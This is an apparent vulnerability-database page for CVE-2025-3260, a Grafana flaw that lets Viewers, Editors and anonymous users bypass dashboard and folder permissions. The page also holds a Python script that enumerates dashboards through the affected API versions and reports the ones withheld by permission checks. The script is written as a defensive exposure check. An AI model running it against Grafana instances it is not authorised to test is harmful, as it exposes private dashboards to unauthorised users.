exploitDog
CVE-2025-3260

Published: 25 Apr 2025
Source: redhat
CVSS3: 8.5
EPSS: Low

Description

A security vulnerability in the /apis/dashboard.grafana.app/* endpoints allows authenticated users to bypass dashboard and folder permissions. The vulnerability affects all API versions (v0alpha1, v1alpha1, v2alpha1). Impact:

  • Viewers can view all dashboards/folders regardless of permissions
  • Editors can view/edit/delete all dashboards/folders regardless of permissions
  • Editors can create dashboards in any folder regardless of permissions
  • Anonymous users with viewer/editor roles are similarly affected

Organization isolation boundaries remain intact. The vulnerability only affects dashboard access and does not grant access to datasources.

    A flaw was found in Grafana. This vulnerability allows users with Viewer or Editor roles to access or modify dashboards without proper permissions.

Report

This vulnerability is rated with an Important severity due to its ability to completely bypass role-based access controls, allowing users with VIEWER or EDITOR roles to access, modify, or delete dashboards regardless of permissions. The impact is further amplified when anonymous authentication is enabled, where unauthenticated users can perform privileged actions, significantly increasing exposure. Although organization-level isolation remains intact, the failure to enforce dashboard-level permissions undermines core security guarantees. It’s important to note that this issue affects only Grafana version 11.6.0, which is not included in any Red Hat supported builds, and therefore Red Hat customers are not impacted.
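The bypass above is confined to the k8s-style /apis/dashboard.grafana.app/* endpoints, so the practical check is to compare what a low-privilege identity sees through those endpoints with what it sees through the legacy, permission-checked dashboard search. The script below is an added example for this page, not Grafana's or Red Hat's code. It assumes (none of this is stated on the page) that the list endpoint is /apis/dashboard.grafana.app/<version>/namespaces/<namespace>/dashboards with namespace "default" for org 1, that each returned item carries the dashboard UID in metadata.name, and that the legacy /api/search endpoint is not affected and can serve as the reference set. The sample responses embedded in it are constructed so it runs offline; against a live instance it is a read-only listing and should only be run against Grafana you are authorized to test.

```python
"""Read-only exposure check for CVE-2025-3260 (added example, not Grafana code).

Assumptions not stated on the page: the k8s-style list endpoint path below,
namespace "default" for org 1, metadata.name == dashboard UID, and that the
legacy /api/search endpoint enforces permissions correctly.
"""
import json
import os
import sys
import urllib.error
import urllib.request
from typing import Iterable

# All three versions are named as affected in the advisory.
API_VERSIONS = ("v0alpha1", "v1alpha1", "v2alpha1")


def dashboards_path(version: str, namespace: str = "default") -> str:
    """Path of the k8s-style dashboard list endpoint for one API version (assumed layout)."""
    return f"/apis/dashboard.grafana.app/{version}/namespaces/{namespace}/dashboards"


def uids_from_search(search_json: list) -> set:
    """Dashboard UIDs from /api/search?type=dash-db; folder hits are skipped."""
    return {d["uid"] for d in search_json if d.get("type") == "dash-db"}


def uids_from_k8s_list(list_json: dict) -> set:
    """Dashboard UIDs from the k8s-style list (metadata.name assumed to be the UID)."""
    return {item["metadata"]["name"] for item in list_json.get("items", [])}


def leaked_uids(reference: Iterable[str], new_api: Iterable[str]) -> set:
    """Dashboards the new API lists although the permission-checked legacy search
    did not. For a Viewer who is denied some dashboards this is non-empty on a
    vulnerable build and empty on a fixed one."""
    return set(new_api) - set(reference)


def fetch_json(base_url: str, path: str, token: str):
    """GET base_url+path. An empty token sends no Authorization header, i.e. the
    anonymous case the report singles out as the worst exposure."""
    headers = {"Authorization": f"Bearer {token}"} if token else {}
    req = urllib.request.Request(base_url.rstrip("/") + path, headers=headers)
    with urllib.request.urlopen(req, timeout=10) as resp:
        return json.loads(resp.read())


def check(base_url: str, token: str, namespace: str = "default") -> dict:
    """Run the comparison for every API version; returns {version: leaked UIDs or HTTP status}."""
    reference = uids_from_search(fetch_json(base_url, "/api/search?type=dash-db", token))
    results = {}
    for version in API_VERSIONS:
        try:
            listed = uids_from_k8s_list(fetch_json(base_url, dashboards_path(version, namespace), token))
        except urllib.error.HTTPError as exc:
            results[version] = f"HTTP {exc.code}"  # endpoint absent or refused on this build
            continue
        results[version] = sorted(leaked_uids(reference, listed))
    return results


# Constructed sample responses, shaped like the two APIs, for an offline demo:
# the legacy search shows the Viewer one dashboard, the new API shows two.
SAMPLE_SEARCH = [
    {"uid": "team-overview", "type": "dash-db"},
    {"uid": "team-folder", "type": "dash-folder"},
]
SAMPLE_K8S_LIST = {"items": [
    {"metadata": {"name": "team-overview"}},
    {"metadata": {"name": "finance-private"}},
]}


def demo() -> set:
    """Offline run over the constructed samples."""
    return leaked_uids(uids_from_search(SAMPLE_SEARCH), uids_from_k8s_list(SAMPLE_K8S_LIST))


if __name__ == "__main__":
    if len(sys.argv) == 2:
        # Usage: GRAFANA_TOKEN=<Viewer service-account token, or empty for anonymous> \
        #        python check.py https://grafana.example
        print(json.dumps(check(sys.argv[1], os.environ.get("GRAFANA_TOKEN", "")), indent=2))
    else:
        print("offline demo, leaked:", sorted(demo()))
```

Run it with a token belonging to a Viewer that is deliberately denied at least one dashboard; if anonymous access is enabled on the instance, run it a second time with an empty token, since the report notes anonymous users holding the viewer or editor role are affected in the same way. Any UID in the result for a version means that endpoint returned a dashboard the permission-checked search withheld.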

Mitigation

Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.

Affected packages

Platform                      Package   State          Recommendation   Release
Red Hat Enterprise Linux 10   grafana   Not affected
Red Hat Enterprise Linux 8    grafana   Not affected
Red Hat Enterprise Linux 9    grafana   Not affected


Additional information

Status: Important
Defect: CWE-281
Bugzilla: https://bugzilla.redhat.com/show_bug.cgi?id=2358556 (grafana: Unauthorized Dashboard Access in Grafana)

EPSS: 0.00013 (percentile 1%), Low
CVSS3: 8.5 High

Related vulnerabilities

CVSS3: 8.3
ubuntu
2 months ago

A security vulnerability in the /apis/dashboard.grafana.app/* endpoints allows authenticated users to bypass dashboard and folder permissions. The vulnerability affects all API versions (v0alpha1, v1alpha1, v2alpha1). Impact: - Viewers can view all dashboards/folders regardless of permissions - Editors can view/edit/delete all dashboards/folders regardless of permissions - Editors can create dashboards in any folder regardless of permissions - Anonymous users with viewer/editor roles are similarly affected Organization isolation boundaries remain intact. The vulnerability only affects dashboard access and does not grant access to datasources.

CVSS3: 8.3
nvd
2 months ago

A security vulnerability in the /apis/dashboard.grafana.app/* endpoints allows authenticated users to bypass dashboard and folder permissions. The vulnerability affects all API versions (v0alpha1, v1alpha1, v2alpha1). Impact: - Viewers can view all dashboards/folders regardless of permissions - Editors can view/edit/delete all dashboards/folders regardless of permissions - Editors can create dashboards in any folder regardless of permissions - Anonymous users with viewer/editor roles are similarly affected Organization isolation boundaries remain intact. The vulnerability only affects dashboard access and does not grant access to datasources.

CVSS3: 8.3
debian
2 months ago

A security vulnerability in the /apis/dashboard.grafana.app/* endpoint ...

CVSS3: 8.3
github
2 months ago

Grafana vulnerable to authenticated users bypassing dashboard, folder permissions

CVSS3: 8.3
fstec
2 months ago

A vulnerability in the Grafana monitoring and observability platform, caused by flaws in the authorization mechanism, that allows an attacker to bypass existing security restrictions
